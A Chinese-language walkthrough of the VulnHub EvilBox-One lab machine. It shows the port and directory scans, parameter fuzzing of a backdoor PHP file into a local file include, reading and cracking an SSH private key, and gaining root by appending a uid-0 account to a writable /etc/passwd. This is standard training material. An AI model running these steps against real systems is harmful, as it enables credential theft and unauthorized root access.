vulnhub6

靶机地址：https://download.vulnhub.com/evilbox/EvilBox---One.ova

准备工作

可以先安装 kali 的字典:

sudo apt install seclists

或者直接输入 seclists，系统会问你是否安装，输入 y 即可自动安装

733 x 3751414 x 723

默认路径就是在 /usr/share/wordlists里面各类的字典非常多

733 x 3451083 x 509

gobuster的安装同理

信息收集

nmap 探测端口开放信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap --min-rate 10000 -p- 192.168.142.129
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 11:12 CST
Nmap scan report for 192.168.142.129
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B5:81:B9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds

nmap 探测开放端口的详细信息以及操作系统等信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap -sV -sT -O -p 22,80 192.168.142.129 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 11:12 CST
Nmap scan report for 192.168.142.129
Host is up (0.00022s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:B5:81:B9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds

fscan 扫描

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ ./fscan_amd64 -h 192.168.142.129

   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.142.129 is alive
[*] Icmp alive hosts len is: 1
192.168.142.129:22 open
192.168.142.129:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://192.168.142.129    code:200 len:10701  title:Apache2 Debian Default Page: It works

只有一个 80 是可利用的，所以就直接访问扫目录了

┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]
└─$ gobuster dir -u http://192.168.142.129/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,asp,jsp,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.142.129/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,asp,jsp,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 319] [--> http://192.168.142.129/secret/]                                                        
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/server-status        (Status: 403) [Size: 280]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

扫出来三个

/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 319] [--> http://192.168.142.129/secret/]

index.html 是默认页面

robots.txt 的内容：

733 x 194894 x 237

可以先记录，万一是后面需要用到的用户名或者密码

接下来就是二层目录爆破/secret 了

733 x 6321062 x 915

扫出一个 evil.php，像是后门文件，没有回显，需要爆破参数

还得猜一下后门类型（eval,system,include）

eval 参数爆破

733 x 4811898 x 1246

无结果

733 x 6001304 x 1067

system 参数爆破

733 x 4811898 x 1246

无结果

733 x 6001304 x 1068

‍

include 参数爆破

733 x 4811898 x 1246

成功爆破出 command

733 x 6001304 x 1067

任意文件读取思路：

1.可以读取/etc/passwd或者知道用户名的前提下，可以看用户目录的历史命令
2.可以看一下/root/.ssh/id_rsa或者/home/user/.ssh/id_rsa查看私钥 公钥文件`authorized_keys`
3.使用php伪协议写文件：
* 写文件：php://filter/write.base64-decode/resource=文件名&txt=写入内容的base64编码
* 如果写入成功的话可以直接查看，否则不成功
4日志包含getshell.
5.filterchains php gen

使用如下命令查看 ssh 登录的相关信息：

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh mowree@192.168.142.129 -v

733 x 8621093 x 1286

发现允许公钥和密码登入，发现只有第二种方法是行得通的

ssh 中密钥和公钥的配置文件路径：

公钥： .ssh/authorized_keys
私钥： .ssh/id_rsa

这里有两种思路去读取：

1.读取 root 的，直接抵达目的（大多情况下权限不够）

2.直接读取用户的配置文件，一般下权限都是足够的

这里只能读取用户的，私钥：

733 x 4811898 x 1246

公钥：

733 x 4811898 x 1246

写入自己的 ssh 文件，然后

但是这里无法直接拿着密钥去登录 ssh 还是需要密码，有两种可能：

1.服务器未开启私钥登录的配置
2.在设置私钥的时候配置了私钥的密码（passphrase）所以在登录的时候还是需要输入密码

getshell

所以下一步就是需要爆破设置的密钥是配置了什么密码，利用 kali 自带的 john 工具

但是这个工具对爆破的内容格式要求比较严格，我们需要使用脚本把格式弄成我们需要的格式，脚本文件位置：/usr/share/john/ssh2john.py

550 x 164

利用此脚本:

python ssh2john.py /root/.ssh/id_rsa > /root/.ssh/hash

然后就可以利用 john 爆破了

733 x 3621097 x 542

密码就是 unicorn

这里登录之前记得赋予 id_rsa 以 600 的权限

chmod 600 id_rsa

使用私钥登入即可

733 x 1821083 x 269

权限提升

suid 提权：

mowree@EvilBoxOne:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su

无可利用的 suid

找内核漏洞：

 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 2   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 3   exploit/linux/local/vmwgfx_fd_priv_esc                              Yes                      The target appears to be vulnerable. vmwgfx installed

三个可能可以利用的，但是没有一个打的通的

‍

查找可写的文件

find / writable 2>/dev/null | grep -v run | grep -v proc | grep -v sys | grep -v var | grep -v usr | grep -v /dev | grep -v apache2 | grep -v ssl

731 x 9131084 x 1354

发现/etc/passwd 文件可写，利用写入新账户提权

mowree@EvilBoxOne:/tmp$ echo 'root2:$1$u1UR7D3z$Zp7IvFndtV5XH/tYozXi6.:0:0:root:/root:/bin/sh' >> /etc/passwd mowree@EvilBoxOne:/tmp$ su root2 Contraseña: id su: Fallo de autenticación mowree@EvilBoxOne:/tmp$ id uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) mowree@EvilBoxOne:/tmp$ su root2 Contraseña: # id uid=0(root) gid=0(root) grupos=0(root)